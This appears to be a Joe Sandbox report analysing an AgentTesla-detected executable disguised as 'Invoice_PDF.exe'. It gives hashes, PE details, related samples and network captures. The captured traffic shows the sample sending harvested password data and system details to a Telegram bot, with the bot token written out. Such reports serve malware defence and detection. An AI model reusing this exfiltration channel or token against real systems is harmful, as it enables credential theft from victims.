                                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        16:54:51API Interceptor701x Sleep call for process: Invoice_PDF.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        149.154.167.220SWIFT_ADVICE.exeGet hashmaliciousBrowse
                                                          Overdue outstanding payment.exeGet hashmaliciousBrowse
                                                            proforma invoice packing list.exeGet hashmaliciousBrowse
                                                              KG236KQE0b.exeGet hashmaliciousBrowse
                                                                TT COPY.exeGet hashmaliciousBrowse
                                                                  proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                    PROFORMA.EXEGet hashmaliciousBrowse
                                                                      Proforma-Invoice CAC1105 CI&PL.exeGet hashmaliciousBrowse
                                                                        8VVKoakLYt.exeGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exeGet hashmaliciousBrowse
                                                                            FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                              Quote.exeGet hashmaliciousBrowse
                                                                                Dhl delivery Express.exeGet hashmaliciousBrowse
                                                                                  stampa_CFS-ITALIA_1123311-655.exeGet hashmaliciousBrowse
                                                                                    Launcher.exeGet hashmaliciousBrowse
                                                                                      BANKASI 657090031.exeGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Barys.226418.1879.exeGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exeGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Trojan.SpyBot.1125.26781.exeGet hashmaliciousBrowse
                                                                                              Emailing Swift.exeGet hashmaliciousBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                api.telegram.orgNew Order4687334.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SWIFT_ADVICE.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Overdue outstanding payment.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                KG236KQE0b.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                TT COPY.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Invoice.doc.scr.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PROFORMA.EXEGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Proforma-Invoice CAC1105 CI&PL.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                8VVKoakLYt.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Quote.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Dhl delivery Express.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                stampa_CFS-ITALIA_1123311-655.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Launcher.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                BANKASI 657090031.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Variant.Barys.226418.1879.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                TELEGRAMRUSWIFT_ADVICE.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Overdue outstanding payment.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                KG236KQE0b.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                TT COPY.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PROFORMA.EXEGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Proforma-Invoice CAC1105 CI&PL.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                8VVKoakLYt.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.GenericKD.47502835.19614.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                nkXzJnW7AH.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                FedEx Shipment Notification - Air WayBill FED1007990_A10792.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Quote.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Dhl delivery Express.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                stampa_CFS-ITALIA_1123311-655.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Launcher.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                BANKASI 657090031.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Variant.Barys.226418.1879.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.GenericKD.38103794.11009.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.Trojan.SpyBot.1125.26781.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0eAegEywmjUJ.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                3t9XLLs9ae.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                mzSVrYKRrI.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SWIFT_ADVICE.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                NOTIFICACION DE CITACION No. 0988-02043-2020. OFICINA DE TALENTO HUMANO.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                WK1CQtJu13.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SecuriteInfo.com.W32.AIDetect.malware1.19028.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                support.Client.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                ysNX6q4xm1.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                YXD40hGJU8.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Orden de Compra -AR95647.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL Receipt Document,pdf.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Glory Hack.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                GenshinHack.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Overdue outstanding payment.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                proforma invoice packing list.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                KG236KQE0b.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Gracehealthmi.org7X9YCEB6AI.htmGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                iXVF1Qz1k5.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_PDF.exe.log
                                                                                                Process:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.355304211458859
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                Malicious:true
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.900031011690095
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:Invoice_PDF.exe
                                                                                                File size:584704
                                                                                                MD5:1dcc43f272f66d8e5afe11e7276dd122
                                                                                                SHA1:cb6a88d1443e7cca944a4176e2a8ebc205f715e3
                                                                                                SHA256:0c6a99b9327cbcb0f3c5b18bc93d347ec8adcb3686e562c515ee4388713e8ed7
                                                                                                SHA512:d3b4b4c93a0b1be2b3effe11e1a4db954f65dc9edf722310ee43defa5cecce6f717fc518b9735c71ef4fac53202c3d314ee6e7e0aab789bc881e4eab6e65a111
                                                                                                SSDEEP:12288:iRyDALnKCZh9TgD29MIY9s0cWEq84Xs10/FKVKmyglGETvHrJrEvE:Yp/jTg6Kxs0cABXe0/Fu3/TlEM
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'..a..............0.................. ........@.. .......................@............@................................

                                                                                                File Icon

                                                                                                Icon Hash:00828e8e8686b000

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x48fe8e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0x619DD327 [Wed Nov 24 05:52:39 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Entrypoint Preview

                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al

                                                                                                Data Directories

                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8fe340x57.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x900000x610.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x920000xc.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                Sections

                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x20000x8de940x8e000False0.927531497579data7.91118342624IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                .rsrc0x900000x6100x800False0.33984375data3.45406453385IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x920000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                Resources

                                                                                                NameRVASizeTypeLanguageCountry
                                                                                                RT_VERSION0x900a00x380data
                                                                                                RT_MANIFEST0x904200x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                Imports

                                                                                                DLLImport
                                                                                                mscoree.dll_CorExeMain

                                                                                                Version Infos

                                                                                                DescriptionData
                                                                                                Translation0x0000 0x04b0
                                                                                                LegalCopyright Real Estate LTD
                                                                                                Assembly Version2.9.0.0
                                                                                                InternalNameOverlappedDa.exe
                                                                                                FileVersion2.8.2.0
                                                                                                CompanyNameBuena Vista Realty Service
                                                                                                LegalTrademarks
                                                                                                Comments
                                                                                                ProductNameObjectHolderList
                                                                                                ProductVersion2.8.2.0
                                                                                                FileDescriptionObjectHolderList
                                                                                                OriginalFilenameOverlappedDa.exe

                                                                                                Network Behavior

                                                                                                Network Port Distribution

                                                                                                TCP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 2, 2021 16:56:42.434241056 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.434289932 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.434371948 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.534015894 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.534053087 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.602024078 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.602269888 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.606867075 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:42.606899023 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.607336044 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:42.650398970 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:44.186492920 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:44.216207981 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:44.218369961 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:44.260874033 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:44.311028957 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:44.311120033 CET44349813149.154.167.220192.168.2.5
                                                                                                Dec 2, 2021 16:56:44.311306000 CET49813443192.168.2.5149.154.167.220
                                                                                                Dec 2, 2021 16:56:44.312737942 CET49813443192.168.2.5149.154.167.220

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Dec 2, 2021 16:56:42.256400108 CET5501653192.168.2.58.8.8.8
                                                                                                Dec 2, 2021 16:56:42.275835037 CET53550168.8.8.8192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                Dec 2, 2021 16:56:42.256400108 CET192.168.2.58.8.8.80x6c77Standard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                Dec 2, 2021 16:56:42.275835037 CET8.8.8.8192.168.2.50x6c77No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                                HTTP Request Dependency Graph

                                                                                                • api.telegram.org

                                                                                                HTTPS Proxied Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                0192.168.2.549813149.154.167.220443C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                TimestampkBytes transferredDirectionData
                                                                                                2021-12-02 15:56:44 UTC0OUTPOST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6d
                                                                                                Host: api.telegram.org
                                                                                                Content-Length: 1009
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                2021-12-02 15:56:44 UTC0INHTTP/1.1 100 Continue
                                                                                                2021-12-02 15:56:44 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 35 63 65 30 63 34 63 39 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 39 35 32 31 36 31 31 35 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 62 35 63 65 30 63 34 63 39 64 36 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 61 6c 66 6f 6e 73 2f 31 32 38 37 35 37 0a 4f 53 46 75 6c
                                                                                                Data Ascii: -----------------------------8d9b5ce0c4c9d6dContent-Disposition: form-data; name="chat_id"1952161154-----------------------------8d9b5ce0c4c9d6dContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/128757OSFul
                                                                                                2021-12-02 15:56:44 UTC1INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Thu, 02 Dec 2021 15:56:44 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 606
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                {"ok":true,"result":{"message_id":442,"from":{"id":1900392974,"is_bot":true,"first_name":"UdLogzx","username":"UdLogzx_bot"},"chat":{"id":1952161154,"first_name":"John","last_name":"ju","type":"private"},"date":1638460604,"document":{"file_name":"user-128757 2021-12-02 07-57-32.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBumGo7LwUeqe_8YHaAhGE1dXH7B9tAAIaEgACKbtIUf8qmO1rIsZlIgQ","file_unique_id":"AgADGhIAAim7SFE","file_size":437},"caption":"New PW Recovered!\n\nUser Name: user/128757\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                                Code Manipulations

                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                Analysis Process: Invoice_PDF.exe PID: 6140 Parent PID: 4684

                                                                                                General

                                                                                                Start time:16:54:43
                                                                                                Start date:02/12/2021
                                                                                                Path:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\user\Desktop\Invoice_PDF.exe"
                                                                                                Imagebase:0xb90000
                                                                                                File size:584704 bytes
                                                                                                MD5 hash:1DCC43F272F66D8E5AFE11E7276DD122
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Reputation:low

                                                                                                Chronological Activities

                                                                                                Analysis Process: Invoice_PDF.exe PID: 5944 Parent PID: 6140

                                                                                                General

                                                                                                Start time:16:54:52
                                                                                                Start date:02/12/2021
                                                                                                Path:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\Desktop\Invoice_PDF.exe
                                                                                                Imagebase:0xed0000
                                                                                                File size:584704 bytes
                                                                                                MD5 hash:1DCC43F272F66D8E5AFE11E7276DD122
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.272859935.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.273395534.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
